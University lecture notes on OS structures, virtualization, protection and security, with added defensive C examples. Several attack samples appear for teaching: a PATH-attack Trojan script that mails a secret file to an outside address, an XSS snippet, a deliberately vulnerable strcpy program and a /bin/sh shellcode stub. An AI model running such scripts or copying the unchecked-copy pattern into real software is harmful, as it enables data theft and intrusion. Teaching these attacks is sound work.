TDDB68 Concurrent Programming and Operating Systems
Lecture 9: OS Structures, VMs and Security
Mikael Asplund, Senior Lecturer
Real-time Systems Laboratory
Department of Computer and Information Science

Copyright Notice: Thanks to Christoph Kessler for much of the material behind these slides. The lecture notes are partly based on Silberschatz’s, Galvin’s and Gagne’s book (“Operating System Concepts”, 7th ed., Wiley, 2005). No part of the lecture notes may be reproduced in any form, due to the copyrights reserved by Wiley. These lecture notes should only be used for internal teaching purposes at the Linköping University.

Today's lecture
● OS structures
● Virtualization
● Protection
● Security

Operating System Structures
● How to manage OS complexity?
  – Divide-and-conquer!
  – Decompose into smaller components with well-defined interfaces and dependences
● Layered Approach
● Microkernels
● Modules
● Virtual Machines

Simple Structure (MSDOS)

Layered Approach
● The operating system is divided into a number of layers (levels, rings), each built on top of lower layers.
● Functions in layer i call only functions/services in layers < i (strict layering: only in i or i-1)

UNIX System Structure: 3 Layers
[Figure label: System and application programs]

Problems of the layered approach
● Cyclic dependences between different OS components
● Less efficient
  – Long call chains (e.g. I/O) down to system calls, possibly with parameter copying/modification at several levels
● Compromise solution: Have few layers

Microkernel System Structure
● “Lean kernel”: Moves as much service functionality as possible from the kernel into “user” space
  – Kernel: Minimal process and memory management; IPC
● Communication between user modules by message passing
● Example: Mach kernel, used e.g. in Tru64 Unix or Mac OS-X

Microkernel Pros and Cons
● Benefits:
  – Easier to extend a microkernel
  – Easier to port the operating system to new architectures
  – More reliable (less code is running in kernel mode)
  – More secure
● Detriments:
  – Performance overhead of user space to kernel space communication

Modules
● Most modern operating systems implement kernel modules
● Component-based approach:
  – Each core component is separate
  – Each talks to the others over known interfaces
  – Each is loadable as needed within the kernel
● Overall, similar to layers but more flexible
Example: Solaris

Example: Mac-OS X “Darwin”
● Hybrid structure: Layering + Microkernel + Modules
  – Application environments, common services, GUI services
  – BSD Unix kernel: Command-line interface, networking, file system support, POSIX implem.
  – Mach Microkernel: Memory mgmt, thread scheduling, IPC, RPC
  – Kernel extensions: device drivers, dynamically loadable modules

Virtual Machines
[Figure: (a) Nonvirtual machine, (b) Virtual machines; labels: guest OS, Virtual Machine Monitor (VMM) / Hypervisor]

Virtual Machine Examples
● Multitasking OS creates the illusion that each process executes on its own (virtual) processor with its own (virtual) memory.
● qemu (used in Pintos labs) simulates x86 hardware
● The Java VM simulates an abstract computer that executes Java bytecode.

VM Advantages
● Complete protection of system resources since each virtual machine is isolated from all other virtual machines.
● Perfect vehicle for operating-systems research, development, teaching
● Portability across multiple platforms (host OS, hardware)
  – Java VM
  – Legacy binary codes for obsolete hardware still operational
● Saves appl.-server hardware costs if clients demand a private system
  – “Most servers today run at <15% utilization, TCO ~10k$/yr/server” [Xen]

VM Disadvantages
● Permits no direct sharing of resources.
● Difficult to implement
  – to provide an exact duplicate to the underlying machine
● Overhead (performance penalty)

Virtualization technology overview
Columns: Traditional virtualization (virt. machine/emulation); Lightweight virtualization: paravirtualization; Lightweight virtualization: OS-level virtualization; Hardware virtualization
  Emulates real or fictitious hardware
  “Almost” same hardware (barring speed and size)
  Virtualization done by the host OS
  Guest HW != host HW
  + guest HW != host HW possible
  + different host and guest OSs possible
  No VMM
  + diff. guest OSs possible
  - VMM needed
  + guest OS is not aware of the host OS beneath
  - guest OS to be rewritten to be VMM-aware (fix privileged instructions)
  On-the-fly instruction translation in hardware
  - VMM needed to dispatch virtual kernel mode privileged instructions
  - translation overhead
  - still overhead
  # of VMs limited
  VM/370 (IBM), VMware, Xen
  Bochs, QEMU, Parallels, UML
  Microsoft Virtual Server, Denali
  Java JVM, C#/.NET CLR
  Guest OS = Host OS (and same HW)
  + Multiple instances of same OS possible
  + Low overhead
  + Can scale up to hundreds of VMs
  (binary translation)
  + Fast
  - Only one OS
  e.g. for virtual private servers (NB - different goal)
  Solaris 10 “Zones” (Containers), OpenVZ, Virtuozzo, LinuxVServer, FreeBSD-Jails
  Transmeta Crusoe processor (x86 on VLIW - more power efficient)

Paravirtualization Example: Xen
[Figure: Control plane software and user software on top of guest OSes (XenoLinux, XenoLinux, XenoBSD, XenoXP), each with Xeno-aware device drivers; Domain0 control interface; Xen hypervisor providing virtual x86 CPU, virtual physical memory, virtual MMU, virtual network and virtual block devices; hardware (SMP x86, MMU, physical memory, network access, SCSI/IDE)]
Adapted from: P. Barham et al.: Xen and the Art of Virtualization. Proc. SOSP 2003

OS-Level Virtualization Example: Solaris 10 Containers (“Zones”)
[Figure: Global zone, Zone 1 and Zone 2, each with user programs, system programs, network addresses, device access, CPU resources and memory resources; below them the virtual platform with zone management and device management; Solaris kernel; network addresses, devices]

The Java Virtual Machine
[Figure: Possibly untrusted applets from internet run in the JVM “sandbox”; all accesses to system resources mediated by JVM]

Hardware support for virtualization
● Simulate mode bit, system call effects, … in software???
● Second hardware mode bit in status register
  – Physical mode bit used only by VMM / host kernel
    ● Virtual machine incl. guest OS runs in physical user mode
  – Virtual mode bit used by guest OS
    ● Virtual kernel mode vs virtual user mode

Summary: Operating System Structures
● How to manage OS complexity?
  – Divide-and-conquer!
  – Decompose into smaller components with well-defined interfaces and dependences
● Layered Approach
● Microkernels
● Modules
● Virtual Machines
  – Traditional Virtualization
  – Light-Weight Virtualization (Paravirtualization, OS-level virtualization)

Protection and Security

Protection vs. Security
● Protection = the mechanisms that can be used to control access to various resources
● Security = a measure of confidence that the integrity of a system and its data will be preserved…
Mechanism: House with door
Policy: Keep the door locked

Protection and Security
Protection (Chapter 14)
● Goals of Protection
● Domain of Protection
● Access Matrix
● Implementation of Access Matrix
● Revocation of Access Rights
● Capability-Based Systems
● Language-Based Protection
Security (Chapter 15)
● The Security Problem
● Authentication
● Program Threats
● System Threats
● Encryption (briefly)

Principle of least privilege: Programs, users and systems should be given just enough privileges to perform their tasks

Domain Structure
● Access-right = <object-name, rights-set> where rights-set is a subset of all valid operations that can be performed on the object.
● Domain = set of access-rights

Domain Implementation
● Standard dual-mode system consists of 2 domains:
  – User
  – Supervisor
● Insufficient for multi-user systems

Unix example
● Domain = user-id (one for each user)
● Domain switch accomplished via file system.
  – Each file has associated with it a domain bit (setuid bit).
  – When file is executed and setuid == on, then user-id is set to owner of the file being executed. When execution completes, user-id is reset.

    ll /bin: ... 28 -r-s--x--x ... 1 root lp 28092 Jan 23 2005 lp*

Access Matrix
● View protection as a matrix (access matrix)
  – Rows represent domains that a process can belong to
  – Columns represent objects that can be operated upon
  – Access(i, j) = set of operations that a process executing in domain Di can invoke on object Fj

Access Matrix (2)
● Access matrix design separates mechanism and policy:
  – Mechanism:
    ● OS provides access matrix
    ● OS ensures that the matrix is only manipulated by authorized agents
  – Policy:
    ● User dictates policy, i.e., she fills in the access matrix, specifying who can access what object and in what mode.

Implementation of Access Matrix
● Each column = Access-control list for one object. Defines who can perform what operation.
    Domain 1 = Read, Write
    Domain 2 = Read
    Domain 3 = Read
● Each row = Capability List (like a key). For each domain, what operations are allowed on what objects to a process in the domain.
    Object 1 – Read
    Object 4 – Read, Write, Execute
    Object 5 – Read, Write, Delete, Copy
Unix: Each file has r-w-x bits for the three domains: owner, group, other users. Nowadays it also has additional access lists for arbitrary users. Win2K, XP: similar
UNIX file descriptor / Win file handle with its pointer to system-wide open file table entry is a capability.

Pros and Cons
Capability lists:
● Simpler run-time behavior – process has all information
● Harder to revoke access rights
  – There may be many processes out there with capabilities that we must search for…
Access control lists:
● Corresponds to the needs of individual users/processes
● Simple to revoke access rights for individual objects
● System-wide overview is difficult – information is spread out
  – What access rights does process P have?
● Overhead
  – ACL must be searched for every access to object
A combination is often used…

Example: Unix file access
● Access lists determine if a file may be opened
● The open method returns a file handle held by the process
  – The file handle is a capability – a proof that the process may operate on that file, …
    ● but only in a way as specified when obtaining the handle – which must still be checked at every access!

(Information) Security: A condition that results from the establishment and maintenance of protective measures that enable an enterprise to perform its mission or critical functions despite risks posed by threats to its use of information systems. [NIST]

Security Attributes
● Confidentiality - the absence of unauthorized disclosure of information
● Integrity - absence of improper system alterations
● Availability - readiness for correct service

Threats against security
● Vulnerability - A weakness in a system, application, or network that is subject to exploitation or misuse.
● Attack - Any kind of malicious activity that attempts to collect, disrupt, deny, degrade, or destroy information system resources or the information itself.

Security Concerns
Physical – the room/building/site must lock out intruders
Humans – are they all trustworthy?
Network – what happens on the wire? Break-in? Denial-of-service?
Operating System – protect itself from mishaps and mis-usage
Easier to protect against accidental usage than against malicious misuse.

OS perspective
● Authentication
● Malware

Authentication
● Crucial to identify user correctly, as protection systems depend on user ID
● User identity most often established through passwords
● Passwords may also either be encrypted or allowed to be used only once

10 most common passwords 2016:
1) 123456
2) password
3) 12345678
4) qwerty
5) 12345
6) 123456789
7) football
8) 1234
9) 1234567
10) baseball

Authentication
● Unix: Passwords are kept in files
  – earlier /etc/passwd, now separate file e.g. /etc/master.passwd or /etc/shadow
● Each password is encrypted with a one-way crypto + a “salt”
  – salt configures the en-/decryption algorithm, extends the password
● To verify a password:
  – Lookup the salt for the user
  – Encrypt the submitted password
  – Compare result with what is stored
● Attack: Steal the password file, generate passwords brute force, or use a dictionary...
  – For a long time only 8 chars of the password were used!

Authentication
● Unix has shaped up
● Still a major problem
  – Yahoo
  – LinkedIn
  – Dropbox
  – ...
https://haveibeenpwned.com/
● New golden standard: Multi-factor authentication

Malware

Classification of Malware
[Figure: Malicious programs. Program threats (need host program): trapdoor (back door), logic bomb, Trojan horse, buffer overflow attack, virus. System threats (independent): worm. Further labels: replicating; PATH attack; fakelogin attack; spyware, e.g. keylogger; zombie (hidden, remotely controlled submachine used e.g. for spam distribution, denial-of-service attacks)]

Program Threats
● Trojan Horse
● Trap Door / Back Door
● Logic Bomb
● Stack and Buffer Overflow
● Virus

Trojan Horse
● Innocent-looking code segment that misuses its environment.
● Exploits mechanisms for allowing programs written by users to be executed by other users.
NEVER download a “funny game” from some site, unless you know and trust the person who wrote it ( the person making it available)

Trojan horse example: PATH attack
● Consider your UNIX search path:
  – % echo $PATH
    e.g., PATH = .:/usr/local/bin:/sw/tex/bin:/home/me/bin
● Do you possibly have a globally writeable (or other user’s) directory in your search path?
  – e.g., /home/me/tmp
  – Attacker stores there an executable file called “ls”
  – Eventually you are in /home/me/tmp (i.e., “.”) and say “ls”
  – Or, you are in another user’s directory (i.e., in “.”) ....

    #!/bin/sh
    rm /home/me/tmp/ls
    cat /home/me/secret.txt | mail [email protected]
    /usr/bin/ls

HTML cross scripting
Do you read HTML-formatted entries on a public bulletin board? Don’t! (…unless you know it has been filtered!) It may contain Javascript ...

    <a onmouseover="runCode();false;">…</a>

…that will get executed when you happen to slide the mouse over that area

Back door / Trap door
● Specific user identifier or password that circumvents normal security procedures.
● Could be included in a compiler.
● Playing internet games? Ever been asked to “download and install” something to continue playing…? DON’T!
Such programs may:
  – Open up a back door for other attacks
  – Join your computer in a stealthy net of proxies… …to be used later
  – ...

Buffer overflow
Because in C an array is just a pointer...
Recall: usual run-time stack with procedure activation record, for main() call [Figure; label: buffer]

C Program with Buffer-Overflow Vulnerability

    #include <stdio.h>
    #include <string.h>
    #define BUFFER_SIZE 256

    int main(int argc, char *argv[])
    {
        char buffer[BUFFER_SIZE];
        if (argc < 2)
            return -1;
        else {
            /* vulnerable: argv[1] is copied without any length check */
            strcpy(buffer, argv[1]);
            return 0;
        }
    }

Buffer Overflow Attack – Modified Shell Code

    #include <stdio.h>
    #include <unistd.h>

    int main(int argc, char *argv[])
    {
        char *args[] = { "/bin/sh", NULL };
        execvp("/bin/sh", args);
        return 0;
    }

An exploit of the buffer overflow vulnerability above
Compile this and obtain executable: a12f341dc76752ffe096c2…d092e4
Write this as an ASCII string with same bit pattern: “$s¤E7\223 T+%yr1!...”, append the right number of NOPs, guess the right start address, append it too, and pass this string as parameter to the service of the previous slide…

Buffer Overflow Attack – Effect on Stack Frame
[Figure: stack frame before copying, and after copying of modified shell code in parameter into buffer]
execvp(…) call creates a shell process that runs with same privileges as the attacked program!

Buffer over-read example: Heartbleed

Secure connections
● Cryptographic mechanisms to ensure
  – Confidentiality
  – Integrity
● Standard protocol: TLS/SSL

Heartbeat in SSL
● Mobile devices can suddenly lose connectivity
● When to abort a partial transaction?
● Use heartbeats to check whether the other party is still there.
● Computer A:
  – Still there? Here is a 20-char message: “ABCDEFGHIJKLMNOPQRST”
● Computer B:
  – I'm still here! You sent a 20-char message: “ABCDEFGHIJKLMNOPQRST”

Heartbleed
● Computer A:
  – Still there? Here is a 20-char message: “A”
● Computer B:
  – I'm still here! You sent a 20-char message: “A##HEMLIGT##HEMLIGT##”
From the source code of OpenSSL

    buffer = OPENSSL_malloc(1 + 2 + payload + padding);
    bp = buffer;
    memcpy(bp, pl, payload);

(pl is pointer to the real message, payload is the given length, bp is a pointer to the message that will be sent)

Heartbleed
● Missing buffer overread bound check in SSL heartbeat code
● In use since 2011, detected and fixed 2014
  – Vulnerable versions with all likelihood still out there
● Attacker can steal up to 64KB of subsequent memory contents
  – Which might contain confidential data, user names and passwords, credit card info, session IDs, private keys, …
    ● Possibly belonging to a different (unrelated) process
  – Undetectable – no one knows how much has leaked out
● Rated at severity level 11 (catastrophic) on a scale of 1..10
Ref.: B. Chandra: A technical view at the OpenSSL Heartbleed vulnerability, IBM

Protection against Buffer Overflow Vulnerabilities
Hardware protection
● Strict separation of program and data memory sections
  – Recent SUN SPARC processors and Solaris versions:
    ● no execution of code located in a stack section (segmentation violation)
  – Recent AMD / Intel x86, for Linux and Windows XP SP2:
    ● NX bit in page table marks page as non-executable
Language and System software protection
● use a tool for automatic bound checking, e.g. Electric Fence
● use a language with built-in bound checks, e.g. Java
Application-level protection (Programmer’s responsibility)
● use strncpy(buffer, argv[1], sizeof(buffer)-1); instead

Program Threats: Viruses
● Virus
  – Code fragment embedded in legitimate program
  – Very specific to CPU architecture, operating system, applications – mainly affect microcomputer systems
  – Downloading viral programs from public bulletin boards or exchanging floppy disks etc. containing an infection.
  – Usually borne via email (attachment) or as a macro
    ● Visual Basic Macro to reformat hard drive

System and Network Threats
● Target: abuse of services and network connections
● Attacks more effective and harder to counter if multiple networked systems are involved

Worms
● Worm = process that uses the spawn mechanism to ravage system performance
  – standalone program
  – Reproduces itself via network links, e.g. Email
  – Often (erroneously) called “virus”
● Most “worms” need a non-critical user
  – e.g. spam mails
  – “New bug found by MS – install this patch now!” …
Microsoft NEVER submits updates via e-mail!

The Morris Internet Worm (1988)
● Exploiting buffer-overflow vulnerability in finger daemon with a 536 byte parameter…
● Exploiting rsh feature of easy remote login without password control
● Exploiting nondisabled debug option (for showing status) vulnerability in sendmail

“But why should they target my computer? I don’t have anything valuable or secret there...”

A Denial of Service (DoS) attack is measured in gigabits per second (Gbps)
50 Gbps attack:
In 2016 a 620 Gbps attack was launched against a security blog
Where did the traffic come from?

Threat Monitoring
● Check for suspicious patterns of activity – i.e., several incorrect password attempts may signal password guessing.
● Audit log – records the time, user, and type of all accesses to an object; useful for recovery from a violation and developing better security measures.
● Threat monitoring - Scan the system periodically for security holes; done when the computer is relatively unused.

What's next?
● Lab deadline March 10th
● Exam March 18th

Want to know more?
● Follow-up courses:
  – Real-time Systems
  – Distributed Systems
  – Computer Security
  – Programming of Parallel Computers - Methods and Tools
  – Compiler Construction
  – ...
● Master thesis project in year 5
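
Added example for the “Example: Unix file access” and “Pros and Cons” slides (not part of the original lecture notes): the program opens a constructed scratch file read-only, shows that the descriptor grants only the mode it was obtained with, and that clearing every permission bit afterwards does not revoke the descriptor already held. The names cap_demo and cap_result and the /tmp scratch path are assumptions made for this illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

struct cap_result {
    int write_errno;     /* errno from write() on the read-only descriptor */
    long read_after;     /* bytes read through the descriptor after chmod 0 */
};

/* Runs the experiment on a constructed scratch file; returns 0 on success. */
int cap_demo(struct cap_result *r)
{
    char path[] = "/tmp/capdemoXXXXXX";   /* assumed writable scratch location */
    char buf[16];

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, "secret", 6) != 6) {
        close(fd);
        unlink(path);
        return -1;
    }
    close(fd);

    /* Access-list check: done once, here, against the file's permission bits. */
    fd = open(path, O_RDONLY);
    if (fd < 0) {
        unlink(path);
        return -1;
    }

    /* The capability only covers the mode it was obtained with. */
    errno = 0;
    r->write_errno = (write(fd, "x", 1) < 0) ? errno : 0;

    /* Revoking every right in the access list does not revoke the handle. */
    if (chmod(path, 0) != 0) { close(fd); unlink(path); return -1; }
    r->read_after = (long)read(fd, buf, sizeof buf);

    close(fd);
    unlink(path);
    return 0;
}

int main(void)
{
    struct cap_result r;
    if (cap_demo(&r) != 0)
        return 1;
    printf("write on O_RDONLY fd: errno=%d (EBADF=%d)\n", r.write_errno, EBADF);
    printf("read after chmod 000: %ld bytes\n", r.read_after);
    return 0;
}
```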
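
Added example for the Heartbleed slides (a simplified model written for these notes, not OpenSSL code): the responder compares the claimed payload length with the length of the record actually received before it echoes anything, which is the bound check the slides describe as missing. The record layout follows the 1 + 2 + payload + padding shape quoted above; the hb_* names are assumptions, and the 16-byte minimum padding is taken from RFC 6520.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HB_HEADER   3    /* 1 byte type + 2 bytes claimed payload length */
#define HB_PADDING 16    /* minimum padding per RFC 6520 */
#define HB_REQUEST  1
#define HB_RESPONSE 2

/* Constructed sample input: a request that claims `claimed` payload bytes
 * but carries only `n`. Returns the real record length. */
size_t hb_make(uint8_t *rec, uint16_t claimed, const char *payload, size_t n)
{
    rec[0] = HB_REQUEST;
    rec[1] = (uint8_t)(claimed >> 8);
    rec[2] = (uint8_t)(claimed & 0xff);
    memcpy(rec + HB_HEADER, payload, n);
    memset(rec + HB_HEADER + n, 0, HB_PADDING);
    return HB_HEADER + n + HB_PADDING;
}

/* Bytes past the end of the record that an unchecked
 * memcpy(bp, pl, payload) would read. Computed only, never performed. */
size_t hb_overread(const uint8_t *rec, size_t rec_len)
{
    if (rec_len < HB_HEADER)
        return 0;
    size_t claimed = ((size_t)rec[1] << 8) | rec[2];
    size_t end = HB_HEADER + claimed;
    return end > rec_len ? end - rec_len : 0;
}

/* Checked responder: returns the response length, or 0 if the record is
 * silently discarded because the claimed length does not fit in it. */
size_t hb_respond(const uint8_t *rec, size_t rec_len, uint8_t *out, size_t cap)
{
    if (rec_len < HB_HEADER + HB_PADDING || rec[0] != HB_REQUEST)
        return 0;
    size_t claimed = ((size_t)rec[1] << 8) | rec[2];
    size_t need = HB_HEADER + claimed + HB_PADDING;
    if (need > rec_len || need > cap)   /* the bound check that was missing */
        return 0;
    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + HB_HEADER, rec + HB_HEADER, claimed);
    memset(out + HB_HEADER + claimed, 0, HB_PADDING); /* real padding is random */
    return need;
}

int main(void)
{
    uint8_t rec[64], out[64];
    size_t len = hb_make(rec, 20, "A", 1);   /* the slide's lying request */
    printf("over-read: %zu bytes, response: %zu bytes\n",
           hb_overread(rec, len), hb_respond(rec, len, out, sizeof out));
    return 0;
}
```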
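
Added example for the application-level protection slide (not from the original slides): strncpy with sizeof(buffer)-1 stops the overflow but never writes the last byte, so the result is only a valid string if that byte already was zero. copy_slide and copy_checked are hypothetical helper names, and the 'X' fill stands in for stale stack contents.

```c
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 256

/* 1 if buf holds a NUL within its first `size` bytes, else 0. */
int is_terminated(const char *buf, size_t size)
{
    return memchr(buf, '\0', size) != NULL;
}

/* The call from the slide, applied to a buffer that still holds old bytes.
 * Returns whether the result is a terminated string. */
int copy_slide(char *buf, size_t size, const char *arg)
{
    strncpy(buf, arg, size - 1);      /* never writes buf[size - 1] */
    return is_terminated(buf, size);
}

/* Hardened variant: reject input that does not fit, always terminate.
 * Returns 0 on success, -1 if arg needs more than size - 1 bytes. */
int copy_checked(char *buf, size_t size, const char *arg)
{
    size_t n = strlen(arg);
    if (size == 0 || n >= size)
        return -1;
    memcpy(buf, arg, n);
    buf[n] = '\0';
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUFFER_SIZE];

    if (argc < 2)
        return -1;
    memset(buffer, 'X', sizeof buffer);   /* stand-in for stale stack data */
    printf("strncpy result terminated: %d\n",
           copy_slide(buffer, sizeof buffer, argv[1]));
    if (copy_checked(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument longer than %d bytes, rejected\n",
                BUFFER_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buffer));
    return 0;
}
```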